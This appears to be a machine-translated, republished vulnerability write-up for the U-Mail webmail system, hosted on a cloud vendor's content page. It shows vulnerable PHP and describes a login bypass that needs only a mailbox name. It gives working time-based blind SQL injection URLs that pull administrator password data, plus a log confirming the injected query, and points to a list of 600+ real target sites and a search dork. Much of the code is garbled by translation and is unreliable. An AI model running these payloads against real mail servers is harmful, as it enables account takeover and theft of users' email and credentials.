An interface vulnerability in the U-Mail system (SQL injection is supported. Attackers can log on to the system and obtain the administrator password)

Source: Internet
Author: User

An interface vulnerability in the U-Mail system (SQL injection is supported. Attackers can log on to the system and obtain the administrator password)

If there are so many email systems, getshell is a headache in minutes.

1. Email system Introduction

1) official: http://www.comingchina.com/html/downloads/

2) version: the latest version V9.8.57

3) test environment: Windows Server 2003 + IIS6.0 + official default Software

4) Case: http://www.comingchina.com/html/case/ OR Google "Powered by U-Mail"

Vulnerability code with more than 600 url download link: http://pan.baidu.com/s/1nQRzo password: ld5k

/Fast/oab/module/operates. php
 

If (ACTION = "save-to-pab") {include_once (LIB_PATH. "PAB. php "); $ PAB = PAB: getinstance (); $ maillist_id = trim ($ _ GET ['maillist']); if ($ maillist_id) {$ member_all = $ Maillist-> getMemberByMaillistID ($ maillist_id, "Mailbox, FullName", 0); if (! $ Member_all) {dump_json (array ("status" => TRUE, "message" => "");} foreach ($ member_all as $ member) {if (! $ PAB-> getContactByMail ($ user_id, $ member ['mailbox'], "contact_id", 0) {$ data = array ("user_id" => $ user_id, "fullname" => $ member ['fullname'], "pref_email" => $ member ['mailbox'], "updated" => date ("Y-m-d H: I: s"); $ res = $ PAB-> add_contact ($ data, 0); if (! $ Res) {dump_json (array ("status" => FALSE, "message" => "An error occurred while adding a contact. Adding failed! ") ;}}} Else {// do not submit maillist, enter $ user_ids = trim ($ _ GET ['userlist']); if (! $ User_ids) {dump_msg ("param_error", "parameter error! ") ;}$ Where =" t1.UserID IN (". $ user_ids. ")"; without single quotes, $ arr_tmp = $ Mailbox-> getMailboxInfo ($ domain_id, $ where, "", "", 0) is generated ); $ user_all = $ arr_tmp ['data']; if (! $ User_all) {dump_json (array ("status" => TRUE, "message" => ""));}



Function File

/Admin/lib/Mailbox. php code
 

Public function getMailboxInfo ($ _ obfuscate_AkPSczrCIu40, $ _ obfuscate_IRFhnYw? = "", $ _ Obfuscate_AedrEg ?? = "", $ _ Obfuscate_xvYeh9I? = "", $ _ Obfuscate_tUi30UB0e88? = "", $ _ Obfuscate_u5srL4rM3PZJLvpPhQ ?? = FALSE, $ _ obfuscate_ySeUHBw? = FALSE) {$ _ obfuscate_AkPSczrCIu40 = intval ($ _ obfuscate_AkPSczrCIu40); $ _ obfuscate_zbtFQY92OYenSG9u = "t1.DomainID = '". $ _ obfuscate_AkPSczrCIu40. "'AND t1.UserID> 2 AND t1.UserID = t2.UserID AND t2.is _ hidden = 0"; if ($ _ obfuscate_IRFhnYw?) {$ _ Obfuscate_zbtFQY92OYenSG9u. = "AND". $ _ obfuscate_IRFhnYw ?; // Directly concatenate the where statement and finally execute the SQL statement} if ($ _ obfuscate_xvYeh9I?) {If ($ _ obfuscate_AedrEg ??) {$ _ Obfuscate_mV9HBLY? = $ _ Obfuscate_AedrEg ?? * $ _ Obfuscate_xvYeh9I? -$ _ Obfuscate_xvYeh9I ?;} If ($ _ obfuscate_mV9HBLY?) {$ _ Obfuscate_UFlHiZJcJu6DQBFE = "LIMIT". $ _ obfuscate_mV9HBLY ?. ",". $ _ Obfuscate_xvYeh9I ?;} Else {$ _ obfuscate_UFlHiZJcJu6DQBFE = "LIMIT". $ _ obfuscate_xvYeh9I ?;}} If ($ _ obfuscate_tUi30UB0e88?) {$ _ Obfuscate_5e2O0TiivW7ec4c? = "Order by". $ _ obfuscate_tUi30UB0e88 ?; If ($ _ obfuscate_u5srL4rM3PZJLvpPhQ ??) {$ _ Obfuscate_5e2O0TiivW7ec4c?. = "DESC" ;}$ _ obfuscate_5e2O0TiivW7ec4c?. = ", T1.FullName ASC";} else {$ _ obfuscate_5e2O0TiivW7ec4c? = "Order by t1.OrderNo DESC, t1.Mailbox ASC"; }$ _ obfuscate_mGXfswsMZQ ?? = "SELECT t1.UserID, t1.Mailbox, t1.FullName, t1.EnglishName, t2. * \ r \ n \ t \ tFROM ". $ this-> get_table_name ("mailbox "). "as t1 ,". $ this-> get_table_name ("info "). "as t2 \ r \ n \ t \ tWHERE ". $ _ obfuscate_zbtFQY92OYenSG9u. "\ r \ n \ t ". $ _ obfuscate_5e2O0TiivW7ec4c ?; $ _ Obfuscate_YdwIclUMQ ?? =$ _ Obfuscate_mGXfswsMZQ ??. "". $ _ Obfuscate_UFlHiZJcJu6DQBFE; if ($ _ obfuscate_ySeUHBw?) {Dump ($ _ obfuscate_YdwIclUMQ ?? );} $ _ Obfuscate_MbMfEtWGUpEscGl = $ this-> db_count ($ _ obfuscate_mGXfswsMZQ ?? ); Unset ($ _ obfuscate_1LzzW8sGEkLaizk? ); $ _ Obfuscate_6RYLWQ ?? = $ This-> db_select ($ _ obfuscate_YdwIclUMQ ??, "More"); return array ("count" = >$ _ obfuscate_MbMfEtWGUpEscGl, "data" = >$ _ obfuscate_6RYLWQ ??);}



There is no need to log on because the mailbox system has a default user, and the file does not verify the user's password, as long as the user name is submitted, that is, the login is successful, and a series of operations can be performed. Run

Http://mail.fuck.com/webmail/fast/index.php? Module = operate & action = login post the following data to mailbox = [email protected] & link =?

The logon is successful. Although the page is not displayed, all functions can be executed.
 



Then execute,

Http://mail.fuck.com/webmail/fast/oab/index.php? Module = operate & action = save-to-pab & userlist = if (ascii (substr (select password from userlist where FullName = 0x73167374656d), 1, 1) = 97, sleep (5), 1)

The executed SQL statement is
 

150121 20:11:25 2263 Connectumail@localhost on  2263 QuerySET NAMES 'UTF8' 2263 Init DBumail 2263 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1))ORDER BY t1.OrderNo DESC,t1.Mailbox ASC


 



View response
 



Then, read the administrator password to operate on all users and emails. The management table is web_usr.
 



Single quotes cannot be introduced in exp. Therefore, the exp values of admin and administrator are

Http://mail.fuck.com/webmail/fast/oab/index.php? Module = operate & action = save-to-pab & userlist = if (ascii (substr (select password from web_usr where role_code = 1), 1, 1) = 97, sleep (5), 1)

Http://mail.fuck.com/webmail/fast/oab/index.php? Module = operate & action = save-to-pab & userlist = if (ascii (substr (select password from userlist where role_code = 2), 1, 1) = 97, sleep (5), 1)

Solution:

You can use your id_list_filter () function.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.